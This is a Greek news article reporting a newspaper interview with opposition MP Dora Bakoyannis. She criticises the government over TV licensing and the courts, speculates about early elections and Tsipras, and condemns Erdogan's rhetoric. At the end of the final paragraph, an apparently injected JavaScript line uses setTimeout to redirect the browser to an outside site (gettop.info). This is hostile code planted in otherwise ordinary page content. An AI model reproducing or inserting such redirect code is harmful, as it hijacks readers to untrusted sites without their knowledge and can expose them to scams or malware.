Μπακογιάννη: Δεν θεωρώ απίθανο ο κ. Τσίπρας να επιδιώξει ηρωική έξοδο

0
5

 

Σε συνέντευξη που παραχώρησε στην εφημερίδα «Κεφάλαιο» η βουλευτής της ΝΔ και πρώην υπουργός εξωτερικών κ. Ντόρα Μπακογιάννη τόνισε πως «η κυβέρνηση παρεμβαίνει στη δικαιοσύνη και υπονομεύει τους θεσμούς«, ενώ στο θέμα των τηλεοπτικών αδειών εξέφρασε την ικανοποίησή της που το Συμβούλιο της Επικρατείας θα εξετάσει την ουσία της υπόθεσης.

«Όπως γνωρίζετε, εμείς πιστεύουμε ότι η μεταφορά των αρμοδιοτήτων από το ΕΣΡ στον υπουργό είναι αντισυνταγματικό νομοθέτημα και γι’ αυτό υποστηρίζουμε ότι δεν έπρεπε η κυβέρνηση να προχωρήσει στη διαδικασία αδειοδότησης των τηλεοπτικών σταθμών πριν το Δικαστήριο κρίνει την ουσία του νόμου Παππά» και σημείωσε «βεβαίως, επιβαλλόταν να μπει τάξη στο τηλεοπτικό τοπίο, αλλά ο αυθαίρετος προσδιορισμός του αριθμού των τηλεοπτικών μέσων, τα οποία κατά την άποψη της κυβέρνησης είναι επιτρεπτά, με προφανή στόχο τον έλεγχο της ενημέρωσης, είναι μια απόφαση την οποία ούτε να διανοηθεί δεν θα τολμούσε άλλη κυβέρνηση της μεταπολίτευσης. Η κυβέρνηση παρεμβαίνει στη δικαιοσύνη και υπονομεύει τους θεσμούς με τις απαράδεκτες μεθοδεύσεις που παρακολουθήσαμε τις τελευταίες ημέρες, οι οποίες παραπέμπουν σε παρακράτος ανομίας και όχι σε κράτος δικαίου«.

Σχετικά με πρόωρες εκλογές η κ. Μπακογιάννη τόνισε: «Η κυβέρνηση είναι σε απόλυτη δυσαρμονία με την κοινωνία κι αυτό αντικατοπτρίζεται σε όλες τις δημοσκοπήσεις με την πλειοψηφία των Ελλήνων να πιστεύει πως η χώρα βαδίζει σε λάθος δρόμο”. Μέσα σε αυτό το γενικότερο κλίμα έλλειψης εμπιστοσύνης προς την κυβέρνηση, η κ. Μπακογιάννη για το ζήτημα των πρόωρων εκλογών αναφέρει: «Μέσα σε αυτό το κλίμα δεν θεωρώ απίθανο ο κ. Τσίπρας να επιδιώξει ηρωική έξοδο«.

Για τις θέσεις της ΝΔ σχετικά με τη ρητορική του Ερντογάν αναφέρει πως «μας απασχολεί πολύ η προκλητικότητα της ρητορικής του Τούρκου προέδρου, η οποία κλιμακώνεται μέρα με τη μέρα. Επίσης, η προσπάθειά του να δικαιολογήσει ή να στηρίξει την απόφαση να στείλει στρατεύματα στη Μοσούλη με ευρύτερους ιδεολογικοϊστορικούς ισχυρισμούς. Είναι βέβαιο ότι η Τουρκία εξάγει την αναταραχή που υπάρχει στο εσωτερικό της, όπου ουσιαστικά ο κ. Ερντογάν έχει αποφασίσει να πολεμήσει την κεμαλική λογική και την κεμαλική κληρονομιά». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here